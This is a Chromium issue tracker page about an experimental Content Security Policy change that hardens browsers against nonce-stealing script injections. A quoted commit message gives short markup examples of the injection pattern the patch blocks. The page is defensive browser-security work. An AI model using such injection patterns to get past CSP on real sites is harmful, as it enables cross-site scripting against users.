New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.

Issue 639293 link

Starred by 1 user
Status: Started
Owner:
mkwst@chromium.org
Buried. Ping if important.
Cc:
a...@google.com
Components:
EstimatedDays: ----
NextAction: ----
OS: Linux , Android , Windows , Chrome , Mac
Pri: 3
Type: Feature



Sign in to add a comment

CSP: Harden against nonce-stealing injections.

Project Member Reported by mkwst@chromium.org, Aug 19 2016 
Experiment along the lines of https://github.com/w3c/webappsec-csp/issues/98 to prevent nonce-stealing injections.
Project Member

Comment 1 by bugdroid1@chromium.org, Aug 31 2016 

The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/91dc56cc74916618193dfad3f72c448ad21089cf

commit 91dc56cc74916618193dfad3f72c448ad21089cf
Author: mkwst <mkwst@chromium.org>
Date: Wed Aug 31 15:07:48 2016

CSP: Experimentally harden against nonce-stealing injections.

As discussed in https://github.com/w3c/webappsec-csp/issues/98, this
patch prevents execution of script via a nonce if an attribute named
"<script" or "<style" is present, or if an attribute's value contains
"<script" or "<style".

That is, given `script-src 'nonce-abc'`, the following will execute:

    <script nonce=abc>
      // yay
    </script>

But the following will not:

    <script <script nonce=abc>
      // yay
    </script>
    <script attribute="<script" nonce=abc>
      // yay
    </script>
    <script <style nonce=abc>
      // yay
    </script>
    <script attribute="<style" nonce=abc>
      // yay
    </script>

Let's see if this is web-compatible, shall we? This patch locks the new
behavior behind the experimental flag, and adds metrics that should
help us understand what the real-world impact would be.

BUG=639293

Review-Url: https://codereview.chromium.org/2260103003
Cr-Commit-Position: refs/heads/master@{#415633}

[modify] https://crrev.com/91dc56cc74916618193dfad3f72c448ad21089cf/third_party/WebKit/LayoutTests/http/tests/security/contentSecurityPolicy/nonces/script-enforce-blocked.php
[modify] https://crrev.com/91dc56cc74916618193dfad3f72c448ad21089cf/third_party/WebKit/Source/core/dom/ScriptLoader.cpp
[modify] https://crrev.com/91dc56cc74916618193dfad3f72c448ad21089cf/third_party/WebKit/Source/core/frame/UseCounter.h
[modify] https://crrev.com/91dc56cc74916618193dfad3f72c448ad21089cf/third_party/WebKit/Source/core/frame/csp/ContentSecurityPolicy.cpp
[modify] https://crrev.com/91dc56cc74916618193dfad3f72c448ad21089cf/third_party/WebKit/Source/core/frame/csp/ContentSecurityPolicy.h
[modify] https://crrev.com/91dc56cc74916618193dfad3f72c448ad21089cf/tools/metrics/histograms/histograms.xml

Comment 2 by est...@chromium.org, Nov 10 2017

Labels: Hotlist-EnamelAndFriendsFixIt

Comment 3 by est...@chromium.org, Feb 18 2018

Labels: -Hotlist-EnamelAndFriendsFixIt

Sign in to add a comment